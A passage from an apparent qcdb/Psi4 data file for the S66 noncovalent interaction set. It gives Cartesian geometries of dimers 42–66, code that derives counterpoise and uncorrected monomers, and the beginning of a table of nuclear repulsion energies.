C -1.35778219 1.10318559 0.22814378
H -2.25657214 1.66773071 0.04984731
C -0.16300320 1.70989257 0.38112632
H -0.04629046 2.78244591 0.33334968
N 0.98545210 1.00082412 0.61120636
H 1.86755978 1.46692777 0.74478430
C 1.02702092 -0.37917011 0.71264723
O 2.04919670 -0.99739548 0.93725979
--
0 1
C 1.14141247 2.35703152 4.05707817
H 0.71056385 2.66808022 3.10429560
H 0.50717856 2.76246464 4.84532582
H 2.12429249 2.81747894 4.15019966
C 1.21442893 0.83816057 4.14659651
H 1.64481257 0.54859772 5.10788747
H 1.88901852 0.44700002 3.38147835
C -0.15035626 0.17999392 3.99177975
H -0.82160052 0.54886973 4.77339899
H -0.59782713 0.49025894 3.04187953
C -0.09406732 -1.34069263 4.05141525
H 0.32953817 -1.64312304 5.01205144
H 0.59745442 -1.70257157 3.28691282
C -1.46335024 -1.98256584 3.86764160
H -1.90172924 -1.70910816 2.90745609
H -1.40641145 -3.06933423 3.91169879
H -2.15131302 -1.65421986 4.64687465
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '42')] = qcdb.Molecule("""
0 1
N 0.19572959 -0.84468925 0.82384642
H 0.45039753 -1.79675294 1.04976794
C -1.17904919 -0.57368440 0.75948349
O -1.99364624 -1.45626526 0.96690066
C -1.47671471 0.81115567 0.43755952
H -2.50635592 1.11565059 0.36389469
C -0.46811280 1.68296245 0.23489084
H -0.63843522 2.72164296 -0.00616410
N 0.84562854 1.30599113 0.32683051
H 1.58969256 1.96887924 0.18595979
C 1.25426147 0.01946187 0.63624397
O 2.42230438 -0.30171639 0.73187948
--
0 1
C 1.05672314 -0.86351031 4.39874366
H 1.51057565 -0.95556655 3.41076111
H 1.60122564 -1.52749058 5.06794134
C 1.11103661 0.60244169 4.83167965
H 2.06932660 1.07534062 4.62095536
H 0.92292133 0.68407923 5.90490278
C -0.05631497 1.21525617 4.06090845
H 0.21798930 1.30403777 3.00743682
H -0.34072939 2.20639729 4.41254246
C -1.17325946 0.17768426 4.23193676
H -1.89879874 0.20129811 3.42056485
H -1.71734509 0.38238141 5.15418538
C -0.45022312 -1.18886357 4.33559365
H -0.69288766 -1.83301970 3.49223397
H -0.76532935 -1.71626599 5.23468007
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '43')] = qcdb.Molecule("""
0 1
N 0.62608128 -0.85091265 0.80591569
H 0.40918989 -1.81150056 1.03440142
C -0.43245619 -0.08733581 0.29466376
O -1.53077162 -0.58840313 0.12359257
C -0.06687462 1.29127521 0.01963739
H -0.80974352 1.95181039 -0.39283965
C 1.18354208 1.71793501 0.29053321
H 1.50185022 2.73387064 0.10983284
N 2.13412979 0.88660160 0.81908177
H 3.05533594 1.22390137 1.04342778
C 1.90278319 -0.44317844 1.12831175
O 2.74380631 -1.16392354 1.62858730
--
0 1
C -0.62370220 -0.02971796 4.73188916
C -1.94044838 0.71157084 4.94676206
H -2.64751979 0.09336465 5.50162440
H -1.78094882 1.63175538 5.51094708
H -2.39815816 0.97306786 3.99160840
C -0.00826558 -0.38315588 6.08316660
H 0.93489659 -0.91552919 5.95238477
H 0.18875537 0.51658585 6.66796874
H -0.67955960 -1.02089289 6.65990335
C 0.34142207 0.86375986 3.95610006
H 1.28999256 0.35116515 3.78574607
H 0.54671227 1.78189631 4.50952643
H -0.08097331 1.14224647 2.98863562
C -0.88501939 -1.30975236 3.94152426
H -1.34875779 -1.08791865 2.97889962
H 0.04755691 -1.84815128 3.76188758
H -1.55552720 -1.97156632 4.49170918
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '44')] = qcdb.Molecule("""
0 1
C 0.66640038 0.18381078 0.41973683
H 1.22888182 -0.32988301 1.18625971
H 1.22803556 0.69720813 -0.34760989
C -0.66597358 0.18297343 0.41961191
H -1.22792171 -0.33149890 1.18610334
H -1.22818427 0.69564575 -0.34774808
--
0 1
C -2.53275995 -0.39365922 4.14534248
H -2.56225339 -1.00668000 3.24415261
H -2.56889390 -1.06787984 5.00095950
H -3.43393131 0.21735721 4.16258843
C -1.27132347 0.45901620 4.18116042
H -1.27172933 1.07910977 5.08055437
H -1.26293512 1.14592451 3.33210001
C -0.00004920 -0.37854138 4.15421721
H -0.00020326 -1.06521408 5.00604923
H 0.00009186 -1.00611921 3.25757472
C 1.27117120 0.45904505 4.18162175
H 1.27144420 1.07885580 5.08110716
H 1.26297638 1.14611970 3.33271412
C 2.53262258 -0.39367946 4.14579757
H 2.56224605 -1.00653596 3.24448839
H 3.43380069 0.21725671 4.16337561
H 2.56854094 -1.06813554 5.00130328
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '45')] = qcdb.Molecule("""
0 1
C -0.60618936 0.05587406 0.58900491
H -1.66803667 0.05577624 0.58901162
C 0.60584873 0.05554087 0.58926624
H 1.66767817 0.05486328 0.58972794
--
0 1
C -2.53040391 -0.34745600 4.21851416
H -2.53877054 -1.00940954 3.35210357
H -2.58232224 -0.97372522 5.10910493
H -3.43281853 0.26144806 4.18575253
C -1.26987178 0.50714472 4.22958343
H -1.28652345 1.18014394 5.08999255
H -1.24460479 1.14136072 3.34078732
C 0.00004684 -0.33118629 4.27003876
H 0.00004957 -0.94897593 5.17310016
H 0.00011393 -1.01948544 3.42079757
C 1.26994540 0.50718978 4.22967030
H 1.28657322 1.18015690 5.09009161
H 1.24480048 1.14136210 3.34086911
C 2.53046789 -0.34744680 4.21872389
H 2.53884766 -1.00942955 3.35234481
H 3.43284666 0.26148455 4.18599753
H 2.58228512 -0.97366153 5.10935743
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '46')] = qcdb.Molecule("""
0 1
C 1.37219093 1.01247736 0.97082468
H 0.95217623 2.01404955 1.03311725
H 1.94742170 0.92651560 0.05071776
H 2.05170208 0.85182517 1.80295247
C 0.32673706 -0.07764727 0.98819876
O 0.61882128 -1.25248130 1.17128126
N -0.95002884 0.34488680 0.77391491
H -1.10467156 1.32202550 0.60611216
C -2.05985440 -0.57736895 0.68015349
H -1.66935602 -1.56679601 0.89718425
H -2.83459176 -0.33138032 1.40366139
H -2.49097050 -0.57892483 -0.31993926
--
0 1
C 2.66066552 0.46274539 4.85334645
H 2.77750480 1.21716129 4.07460163
H 2.57455515 0.98763172 5.80500251
H 3.57275696 -0.13149652 4.88015446
C 1.43239329 -0.40064212 4.59579490
H 1.33782394 -1.14609612 5.38884574
H 1.54881342 -0.95410645 3.66195110
C 0.14985545 0.41797183 4.53049355
H 0.03828513 0.99570671 5.45357719
H 0.22908959 1.15078674 3.72084090
C -1.09450084 -0.43236340 4.31361365
H -1.18530281 -1.14684989 5.13503088
H -0.96669384 -1.02130113 3.40339920
C -2.36133934 0.40792810 4.22349893
H -2.29442610 1.11497908 3.39572969
H -3.24668156 -0.20808939 4.06966602
H -2.51169538 0.98413919 5.13671852
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '47')] = qcdb.Molecule("""
0 1
C 0.72918867 1.11310122 0.32672825
H 1.30321590 2.01422234 0.15916027
C 1.37508737 -0.11936635 0.41277695
H 2.45051474 -0.17462400 0.31330720
C 0.63503981 -1.28055339 0.62938541
H 1.13633448 -2.23601747 0.70021716
C -0.75098563 -1.20965430 0.75789034
H -1.32452590 -2.11141283 0.92419891
C -1.39703443 0.02267081 0.67308963
H -2.47242537 0.07848826 0.77399799
C -0.65689731 1.18429622 0.45833859
H -1.15782845 2.14058713 0.39509608
--
0 1
C 0.15810619 0.15289032 4.08588285
H 0.28023260 0.37837378 3.03545641
C -0.93297537 -0.60200829 4.51321912
H -1.65347990 -0.95852255 3.78952470
C -1.09367536 -0.89613361 5.86616918
H -1.94078294 -1.48210218 6.19641672
C -0.16179279 -0.43508023 6.79466326
H -0.28568629 -0.66304639 7.84467076
C 0.92979230 0.32002182 6.36942298
H 1.65291139 0.67785500 7.08980563
C 1.08859620 0.61350684 5.01593166
H 1.93585412 1.19958163 4.68588434
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '48')] = qcdb.Molecule("""
0 1
N 1.32276272 -0.01037598 1.01918373
C 0.65128601 -1.14899203 0.79680119
H 1.20041842 -2.06552808 0.97367282
C -0.67268130 -1.19471172 0.36665693
H -1.15719362 -2.14732141 0.20646407
C -1.34719676 0.00313399 0.15214401
H -2.37535653 0.00840542 -0.18229302
C -0.66455797 1.19409062 0.37900199
H -1.14262633 2.15155765 0.22872051
C 0.65889576 1.13497854 0.80885987
H 1.21410272 2.04591045 0.99543831
--
0 1
N 0.45011507 0.00130104 6.78095972
C 1.32078309 -0.00431175 5.76154669
H 2.36863966 -0.00306323 6.03584948
C 0.94739735 -0.01137951 4.41971862
H 1.69485802 -0.01554353 3.63861897
C -0.40865120 -0.01279358 4.10730315
H -0.73837988 -0.01824905 3.07702170
C -1.32675447 -0.00707849 5.15247277
H -2.39120450 -0.00792788 4.96373698
C -0.85115066 -0.00016084 6.46143162
H -1.54333433 0.00442229 7.29462282
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '49')] = qcdb.Molecule("""
0 1
C 0.84507720 1.05791869 0.69945490
H 1.50640601 1.90322178 0.83338235
C 1.37550931 -0.21745534 0.51116093
H 2.44718367 -0.36147258 0.50285232
C 0.52406810 -1.30704432 0.33319233
H 0.93572726 -2.29602641 0.18492305
C -0.85771573 -1.12146341 0.34638409
H -1.51838119 -1.96645805 0.20836325
C -1.38804570 0.15363438 0.53761349
H -2.45971752 0.29741587 0.55003229
C -0.53661315 1.24342221 0.71273882
H -0.94892427 2.23280628 0.85736635
--
0 1
N 0.02311730 0.35202455 6.77454464
C 0.17780112 1.28998616 5.82966776
H 0.31957195 2.30251216 6.18756949
C 0.16359185 1.02269639 4.46316833
H 0.29383191 1.82372219 3.74928292
C -0.02074646 -0.28893329 4.03787790
H -0.03731291 -0.53205196 2.98452996
C -0.18259538 -1.27396762 5.00673698
H -0.32913840 -2.30917859 4.73196547
C -0.15339291 -0.90663452 6.34982649
H -0.27698904 -1.65414849 7.12392749
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '50')] = qcdb.Molecule("""
0 1
C 0.83661195 1.11485600 0.23100790
H 1.48545250 1.97968049 0.21470491
C 1.38418781 -0.16696533 0.26005688
H 2.45768419 -0.29628753 0.26605977
C 0.54747934 -1.28184652 0.28693051
H 0.97191784 -2.27597918 0.31387670
C -0.83666710 -1.11500365 0.28456279
H -1.48555353 -1.97956851 0.30969784
C -1.38416274 0.16685015 0.25560540
H -2.45764469 0.29645927 0.25854055
C -0.54749833 1.28174826 0.22897743
H -0.97214124 2.27600137 0.21116093
--
0 1
C 0.00585466 0.07515017 3.77945155
H 0.00284553 0.05759463 2.71537604
C 0.00951511 0.09473103 4.99182772
H 0.01262752 0.11190396 6.05302473
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '51')] = qcdb.Molecule("""
0 1
C -0.60172996 -0.02857012 0.38493492
H -1.66373543 -0.02852657 0.37901431
C 0.61010917 -0.02866364 0.38816379
H 1.67213544 -0.02879308 0.38796752
--
0 1
C -0.00735998 0.10033739 4.14281190
H -0.00396560 0.06660234 3.07951502
C -0.01129640 0.13862741 5.35427728
H -0.01456263 0.17200329 6.41518870
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '52')] = qcdb.Molecule("""
0 1
C 0.96408039 0.87509331 0.37801364
H 1.65982961 1.69993082 0.44604227
C 1.43105709 -0.41313344 0.11899152
H 2.48952453 -0.58720917 -0.01701261
C 0.53412766 -1.47763890 0.04241755
H 0.89696129 -2.47738839 -0.15201199
C -0.83032682 -1.25360409 0.22085611
H -1.52576001 -2.07962435 0.16411655
C -1.29758715 0.03441261 0.48024263
H -2.35439607 0.20801612 0.62856096
C -0.40044509 1.09977921 0.56160137
H -0.76045514 2.09376880 0.78475698
--
0 1
C -0.11985517 0.53438939 4.36008118
O -0.58804476 1.58383601 3.98082079
O 0.28335741 -0.44317387 3.52079591
H 0.11465259 -0.11726029 2.61939066
C 0.09009913 0.13740231 5.79148697
H -0.21986702 0.94673889 6.44147585
H -0.48598160 -0.75922167 6.00843808
H 1.13859655 -0.09872978 5.95650555
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '53')] = qcdb.Molecule("""
0 1
C 0.85556074 0.35853244 1.04975426
H 1.51382550 0.90267956 1.71276582
C 1.34289713 -0.67537866 0.25115740
H 2.39288384 -0.93334472 0.28196305
C 0.47780661 -1.37670110 -0.58781577
H 0.85608399 -2.17890753 -1.20682428
C -0.87482983 -1.04255615 -0.63045178
H -1.54540573 -1.58570014 -1.28241614
C -1.36239729 -0.00701391 0.16584645
H -2.41157102 0.25346723 0.13077885
C -0.49844404 0.69315695 1.00699199
H -0.86611090 1.49033989 1.63803696
--
0 1
C 0.08192937 0.49753072 4.80472861
O 0.32841872 1.54095697 4.21748933
N -0.22211788 -0.65747581 4.15356127
H -0.19691756 -0.66449114 3.14692466
H -0.37789436 -1.51296813 4.64926298
C 0.10477407 0.40263889 6.31314609
H 1.13648787 0.48685118 6.64821988
H -0.31712984 -0.52400410 6.69417176
H -0.44469059 1.24648520 6.71991660
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '54')] = qcdb.Molecule("""
0 1
C 0.78014717 -0.60991473 -1.20755689
H 0.89619160 -1.13763959 -2.14414463
C 0.47794275 0.75099363 -1.20789541
H 0.35696423 1.27816780 -2.14405407
C 0.32728928 1.43186787 -0.00000000
H 0.09146503 2.48713922 0.00000000
C 0.47794275 0.75099363 1.20789541
H 0.35696423 1.27816780 2.14405407
C 0.78014717 -0.60991473 1.20755689
H 0.89619160 -1.13763959 2.14414463
C 0.93164831 -1.28998134 0.00000000
H 1.16848573 -2.34521369 -0.00000000
--
0 1
O -2.74383121 -0.26926257 0.00000000
H -2.57902721 -1.21398410 0.00000000
H -1.85653027 0.10232776 0.00000000
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '55')] = qcdb.Molecule("""
0 1
C 0.75974918 1.03127506 0.37377239
H 1.43501626 1.87566427 0.37470462
C 1.26661779 -0.26736234 0.42127308
H 2.33491597 -0.42918019 0.45943234
C 0.39532054 -1.35599116 0.42490511
H 0.78866193 -2.36249259 0.46303549
C -0.98220564 -1.14665441 0.38127024
H -1.65765632 -1.99114019 0.38512100
C -1.48934612 0.15114979 0.33757234
H -2.55794704 0.31375049 0.30771900
C -0.61877516 1.24033121 0.33388373
H -1.01176161 2.24710690 0.30436922
--
0 1
O 0.04701895 0.30618537 3.68511328
H 0.13311917 0.35605847 2.72791973
C -0.84913165 -0.75142870 3.96816832
H -0.94485234 -0.80816328 5.04910445
H -1.84128123 -0.57973096 3.54437811
H -0.48267133 -1.71446977 3.60525680
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '56')] = qcdb.Molecule("""
0 1
C 0.69231523 1.08829204 0.32484124
H 1.28194880 1.99194678 0.25251578
C 1.31818722 -0.15687008 0.28689607
H 2.39314337 -0.21947636 0.18840681
C 0.55801841 -1.32195045 0.38139986
H 1.04391922 -2.28757380 0.35761542
C -0.82755236 -1.24142187 0.51168501
H -1.41670095 -2.14525152 0.58533927
C -1.45341138 0.00367145 0.54838107
H -2.52823255 0.06570272 0.64984254
C -0.69346094 1.16840108 0.45622907
H -1.17873534 2.13440989 0.48572685
--
0 1
N 0.27506479 -0.22271725 3.85890709
H 0.40968315 -0.17867675 2.85583573
H 0.41655736 0.72242949 4.19137936
C -1.10103469 -0.62910066 4.13634288
H -1.25891125 -0.65764767 5.21289841
H -1.87233687 0.01128013 3.69622388
H -1.25572667 -1.63866846 3.76072118
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '57')] = qcdb.Molecule("""
0 1
C 0.40877989 1.05102502 0.37553605
H 1.01193875 1.94854570 0.36807788
C 1.01916788 -0.19976963 0.28905343
H 2.09557130 -0.27183333 0.21719099
C 0.24172263 -1.35688270 0.29668995
H 0.71521633 -2.32658869 0.22807218
C -1.14617971 -1.26425757 0.39390198
H -1.74918186 -2.16192663 0.39940980
C -1.75727780 -0.01396023 0.48295173
H -2.83351378 0.05824368 0.55903918
C -0.97968602 1.14420653 0.47228370
H -1.45405142 2.11400088 0.53713589
--
0 1
C 0.24562178 1.95675759 4.25663541
H -0.11252332 2.12248844 3.24334264
H 1.27020534 2.31346716 4.33807692
H -0.35847510 2.53039342 4.95498813
C 0.20877544 0.50359448 4.67234424
O 0.49340385 0.15123306 5.81088230
N -0.16361983 -0.36212226 3.69310315
H -0.32474773 -0.00413152 2.76703481
C -0.20041270 -1.78900149 3.91119021
H -0.12232513 -1.95590903 4.98118644
H -1.13565324 -2.20735207 3.54445210
H 0.62871378 -2.29287426 3.41385278
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '58')] = qcdb.Molecule("""
0 1
N -0.94121124 0.79004136 0.01171891
C -0.92275524 -0.55237814 0.03537875
H 0.05724051 -1.01558800 0.05135491
C -2.07651907 -1.33301813 0.03929035
H -1.99652895 -2.41058573 0.05887720
C -3.31631294 -0.70333955 0.01759905
H -4.23157489 -1.27908429 0.01979377
C -3.34889528 0.68701881 -0.00708596
H -4.28544414 1.22610455 -0.02465899
C -2.14310382 1.38263356 -0.00889005
H -2.13809974 2.46565258 -0.02778297
--
0 1
N 2.53321129 -0.95002930 0.04251789
C 3.73499010 -1.54320554 0.04459773
H 3.72976625 -2.62616799 0.06648690
C 4.94092634 -0.84824698 0.02059635
H 5.87736466 -1.38778216 0.02369036
C 4.90860873 0.54205748 -0.00715036
H 5.82398367 1.11730853 -0.02633187
C 3.66892840 1.17234361 -0.00962746
H 3.58915567 2.24990219 -0.03071603
C 2.51501483 0.39233399 0.01556620
H 1.53510443 0.85599657 0.01390336
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '59')] = qcdb.Molecule("""
0 1
C -1.00686722 -0.03056821 -0.02477285
H 0.05900333 -0.06093974 -0.04936562
C -2.21874380 0.00317347 0.00259920
H -3.27927730 0.03352491 0.02720048
--
0 1
O 2.26390460 -0.14557006 -0.11547082
H 2.83426102 -0.73533944 0.38155611
H 2.83590044 0.20541797 -0.80084297
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '60')] = qcdb.Molecule("""
0 1
C -0.61056257 0.22750310 -0.17060207
H 0.10738506 0.86143603 -0.63420924
C -1.38627573 -0.52532550 0.37997353
H -2.08070324 -1.17406739 0.85437937
--
0 1
C 2.83444960 -0.64143137 0.46593603
O 2.58027054 0.31467087 -0.23290172
O 1.88654498 -1.41577160 1.03362263
H 1.02554559 -1.04847261 0.76585149
C 4.21008475 -1.12288120 0.81608694
H 4.94847057 -0.48533112 0.34523661
H 4.33629527 -1.11102648 1.89612226
H 4.33236190 -2.15072575 0.48285261
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '61')] = qcdb.Molecule("""
0 1
C -2.27534498 -0.13507494 0.83133387
H -2.49071776 -0.72792669 -0.05756635
H -2.22632382 -0.81844641 1.67882341
H -3.11202566 0.54494342 0.98740008
C -0.96169812 0.61927789 0.66939920
H -0.78869920 1.25043181 1.54470266
H -1.02617687 1.29544524 -0.18645838
C 0.22650217 -0.31471031 0.47998579
H 0.30944439 -0.97513911 1.34803794
H 0.03915056 -0.96599875 -0.37878983
C 1.54300168 0.42117452 0.26899951
H 1.71163863 1.10777177 1.10244654
H 1.46609466 1.04374331 -0.62529358
C 2.72757633 -0.52686091 0.13745931
H 2.58874155 -1.20321391 -0.70575734
H 3.66150100 0.01169308 -0.01596863
H 2.83519407 -1.13740994 1.03407512
--
0 1
C -0.48356149 -0.28786315 4.12125154
O -0.90617543 -1.40304340 3.92410496
O -1.29725385 0.77110237 4.35384102
H -2.19801596 0.41672183 4.31330528
C 0.95670557 0.12180293 4.13845692
H 1.58252864 -0.74837801 3.98030176
H 1.13274299 0.85607656 3.35533234
H 1.19401682 0.59110388 5.09025931
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '62')] = qcdb.Molecule("""
0 1
C -2.58777605 -0.32310566 0.46945828
H -2.61038910 -0.87636604 -0.46961946
H -2.65974410 -1.05188654 1.27771411
H -3.47603507 0.30562460 0.50896129
C -1.30955982 0.49739424 0.58506260
H -1.31725060 1.08326190 1.50634108
H -1.26237673 1.21557375 -0.23677617
C -0.05682966 -0.36826029 0.55844017
H -0.08617526 -1.07335882 1.39587537
H -0.05380919 -0.97684333 -0.35147393
C 1.23159606 0.44006559 0.63203246
H 1.21328340 1.05356193 1.53459305
H 1.26629733 1.13137662 -0.21310563
C 2.47257523 -0.44314441 0.61922148
H 2.52071888 -1.03526342 -0.29489695
H 3.38773437 0.14408974 0.68390871
H 2.45929703 -1.13936423 1.45861821
--
0 1
C 0.04216222 0.20124208 4.11650819
O 0.06907449 1.38631556 3.82466701
N 1.17474249 -0.55063556 4.21932814
H 2.04568275 -0.12805505 3.95066588
H 1.13580453 -1.54252223 4.35075106
C -1.24805876 -0.53769541 4.38096202
H -1.10080876 -1.49841677 4.86808639
H -1.75428629 -0.69600434 3.43014867
H -1.88600271 0.08954102 4.99623387
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '63')] = qcdb.Molecule("""
0 1
C 0.60678496 1.33042185 0.31643451
H 1.24649846 2.20226434 0.33035231
C 1.11808466 0.08724886 0.68511652
H 2.15005753 -0.00388678 0.99375824
C 0.29290229 -1.03608737 0.66910727
H 0.68849686 -2.00096149 0.95537797
C -1.04283174 -0.91671112 0.28818964
H -1.68270956 -1.78848825 0.27934903
C -1.55358838 0.32734899 -0.07994317
H -2.58923495 0.42028908 -0.37734619
C -0.72804164 1.45084316 -0.06684834
H -1.12362379 2.41565865 -0.35386143
--
0 1
C 0.41898688 -0.27167884 4.02497697
O 1.61447955 -0.10772809 4.10149274
O -0.16051479 -1.48308380 4.22441532
H 0.57393607 -2.08419229 4.41745344
C -0.60289735 0.77225268 3.70429579
H -0.12460293 1.74319903 3.65747301
H -1.05569745 0.53905649 2.74158774
H -1.38774836 0.76671618 4.45679527
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '64')] = qcdb.Molecule("""
0 1
C 1.62971482 0.50301252 0.27011189
H 1.64157338 1.45923792 -0.24808286
H 2.31531919 -0.18355470 -0.21758635
H 1.96974564 0.64936024 1.29398105
C 0.26182776 -0.13286122 0.31456221
O 0.09925265 -1.30961602 0.61183995
N -0.77350225 0.70251214 0.02207590
H -0.56901138 1.66655677 -0.16581434
C -2.15001214 0.26596865 0.09505328
H -2.14473761 -0.81940745 0.10091210
H -2.64054318 0.61582035 1.00360442
H -2.70774393 0.62075110 -0.76826057
--
0 1
C -0.04575608 0.51799706 3.77621664
H -0.05063764 1.26017087 4.56209922
H -0.69428883 0.68576570 2.92753308
C 0.72275422 -0.56896486 3.84602626
H 1.36805919 -0.74079051 4.69615412
H 0.71764224 -1.30416499 3.05371698
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '65')] = qcdb.Molecule("""
0 1
N -0.08303249 0.00071459 1.05519999
C -0.20285376 -1.14172585 0.36493369
H -0.09848563 -2.05509795 0.93743262
C -0.44678144 -1.19176367 -1.00451226
H -0.53364921 -2.14585511 -1.50417155
C -0.57468209 0.00343953 -1.70430948
H -0.76368391 0.00448010 -2.76872670
C -0.45345675 1.19724254 -1.00091647
H -0.54563080 2.15227264 -1.49779508
C -0.20931111 1.14450759 0.36836730
H -0.11016707 2.05669726 0.94357396
--
0 1
C 0.47183602 -0.00605819 5.54171896
H 0.58724607 -0.00548400 6.59673278
C 0.33976626 -0.00660792 4.33547166
H 0.22161814 -0.00634549 3.27096619
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '66')] = qcdb.Molecule("""
0 1
N -0.54105920 0.02957620 -0.20899508
H 0.05555335 -0.78611810 -0.13029335
H -1.46966940 -0.27470845 0.05314338
C -0.07879927 1.04239036 0.73845886
H -0.72015294 1.91941377 0.67198026
H -0.05075819 0.72382293 1.78551453
H 0.92643072 1.35660379 0.46199919
--
0 1
N 2.34185022 -1.25680010 0.03015300
C 2.68028654 -0.44445604 -0.98155948
H 2.13761932 -0.58899402 -1.90694084
C 3.65161580 0.54767776 -0.88119247
H 3.87646824 1.17201804 -1.73404317
C 4.31245587 0.71721920 0.33107196
H 5.07030981 1.47945653 0.44745609
C 3.97232296 -0.11774333 1.39019492
H 4.45491136 -0.02728109 2.35289557
C 2.98854139 -1.08253234 1.19101154
H 2.70245706 -1.74627994 1.99762219
units angstrom
""")
# <<< Derived Geometry Strings >>>
for rxn in HRXN:
GEOS['%s-%s-monoA-unCP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(1)
GEOS['%s-%s-monoB-unCP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(2)
GEOS['%s-%s-monoA-CP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(1, 2)
GEOS['%s-%s-monoB-CP' % (dbse, rxn)] = GEOS['%s-%s-dimer' % (dbse, rxn)].extract_fragments(2, 1)
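# NB: by qcdb convention, extract_fragments(1) keeps only fragment 1 in its
# own basis (the uncorrected "unCP" monomer), while extract_fragments(1, 2)
# keeps fragment 1 as real atoms and fragment 2 as ghost atoms, i.e. the
# monomer in the full dimer basis used for the counterpoise ("CP") correction.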
#########################################################################
# <<< Supplementary Quantum Chemical Results >>>
DATA = {}
DATA['NUCLEAR REPULSION ENERGY'] = {}
DATA['NUCLEAR REPULSION ENERGY']['S66-1-dimer' ] = 36.51369349
DATA['NUCLEAR REPULSION ENERGY']['S66-1-monoA-unCP' ] = 9.15671411
DATA['NUCLEAR REPULSION ENERGY']['S66-1-monoB-unCP' ] = 9.17259114
DATA['NUCLEAR REPULSION ENERGY']['S66-2-dimer' ] = 79.98338083
DATA['NUCLEAR REPULSION ENERGY']['S66-2-monoA-unCP' ] = 9.14996836
DATA['NUCLEAR REPULSION ENERGY']['S66-2-monoB-unCP' ] = 40.29463192
DATA['NUCLEAR REPULSION ENERGY']['S66-3-dimer' ] = 79.77996002
DATA['NUCLEAR REPULSION ENERGY']['S66-3-monoA-unCP' ] = 9.12565570
DATA['NUCLEAR REPULSION ENERGY']['S66-3-monoB-unCP' ] = 42.06267577
DATA['NUCLEAR REPULSION ENERGY']['S66-4-dimer' ] = 246.86074225
DATA['NUCLEAR REPULSION ENERGY']['S66-4-monoA-unCP' ] = 9.13184124
DATA['NUCLEAR REPULSION ENERGY']['S66-4-monoB-unCP' ] = 180.56084030
DATA['NUCLEAR REPULSION ENERGY']['S66-5-dimer' ] = 129.52156842
DATA['NUCLEAR REPULSION ENERGY']['S66-5-monoA-unCP' ] = 40.41731272
DATA['NUCLEAR REPULSION ENERGY']['S66-5-monoB-unCP' ] = 40.29806380
DATA['NUCLEAR REPULSION ENERGY']['S66-6-dimer' ] = 131.81617640
DATA['NUCLEAR REPULSION ENERGY']['S66-6-monoA-unCP' ] = 40.42467073
DATA['NUCLEAR REPULSION ENERGY']['S66-6-monoB-unCP' ] = 42.05202847
DATA['NUCLEAR REPULSION ENERGY']['S66-7-dimer' ] = 313.95975412
DATA['NUCLEAR REPULSION ENERGY']['S66-7-monoA-unCP' ] = 40.41876218
DATA['NUCLEAR REPULSION ENERGY']['S66-7-monoB-unCP' ] = 180.73873695
DATA['NUCLEAR REPULSION ENERGY']['S66-8-dimer' ] = 78.74537406
DATA['NUCLEAR REPULSION ENERGY']['S66-8-monoA-unCP' ] = 40.42326344
DATA['NUCLEAR REPULSION ENERGY']['S66-8-monoB-unCP' ] = 9.17236900
DATA['NUCLEAR REPULSION ENERGY']['S66-9-dimer' ] = 129.31867271
DATA['NUCLEAR REPULSION ENERGY']['S66-9-monoA-unCP' ] = 42.10593235
DATA['NUCLEAR REPULSION ENERGY']['S66-9-monoB-unCP' ] = 40.34710761
DATA['NUCLEAR REPULSION ENERGY']['S66-10-dimer' ] = 131.71717765
DATA['NUCLEAR REPULSION ENERGY']['S66-10-monoA-unCP' ] = 42.09217552
DATA['NUCLEAR REPULSION ENERGY']['S66-10-monoB-unCP' ] = 42.05982938
DATA['NUCLEAR REPULSION ENERGY']['S66-11-dimer' ] = 320.50976921
DATA['NUCLEAR REPULSION ENERGY']['S66-11-monoA-unCP' ] = 42.09328618
DATA['NUCLEAR REPULSION ENERGY']['S66-11-monoB-unCP' ] = 180.72211450
DATA['NUCLEAR REPULSION ENERGY']['S66-12-dimer' ] = 81.87844165
DATA['NUCLEAR REPULSION ENERGY']['S66-12-monoA-unCP' ] = 42.04336531
DATA['NUCLEAR REPULSION ENERGY']['S66-12-monoB-unCP' ] = 9.12312499
DATA['NUCLEAR REPULSION ENERGY']['S66-13-dimer' ] = 314.84789007
DATA['NUCLEAR REPULSION ENERGY']['S66-13-monoA-unCP' ] = 180.80545988
DATA['NUCLEAR REPULSION ENERGY']['S66-13-monoB-unCP' ] = 40.30378877
DATA['NUCLEAR REPULSION ENERGY']['S66-14-dimer' ] = 315.64348724
DATA['NUCLEAR REPULSION ENERGY']['S66-14-monoA-unCP' ] = 180.81499576
DATA['NUCLEAR REPULSION ENERGY']['S66-14-monoB-unCP' ] = 42.03791353
DATA['NUCLEAR REPULSION ENERGY']['S66-15-dimer' ] = 540.42243680
DATA['NUCLEAR REPULSION ENERGY']['S66-15-monoA-unCP' ] = 180.53794513
DATA['NUCLEAR REPULSION ENERGY']['S66-15-monoB-unCP' ] = 180.54327910
DATA['NUCLEAR REPULSION ENERGY']['S66-16-dimer' ] = 243.51194018
DATA['NUCLEAR REPULSION ENERGY']['S66-16-monoA-unCP' ] = 180.57089645
DATA['NUCLEAR REPULSION ENERGY']['S66-16-monoB-unCP' ] = 9.17374713
DATA['NUCLEAR REPULSION ENERGY']['S66-17-dimer' ] = 1040.55250335
